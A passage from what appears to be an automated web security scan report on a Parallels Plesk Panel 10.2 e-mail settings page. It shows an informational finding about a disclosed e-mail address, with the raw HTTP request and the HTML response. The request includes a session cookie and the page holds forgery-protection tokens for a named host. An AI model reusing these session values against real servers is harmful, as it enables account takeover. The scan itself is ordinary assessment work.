<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>format-1</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.2. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:30:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:30:02 GMT
Connection: close
Content-Length: 36392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F2' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> The user account was not found. This could happen if the user account was removed by someone else while you were changing its settings. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="fdf080d9224fd0d18957a62c" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>format-1</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
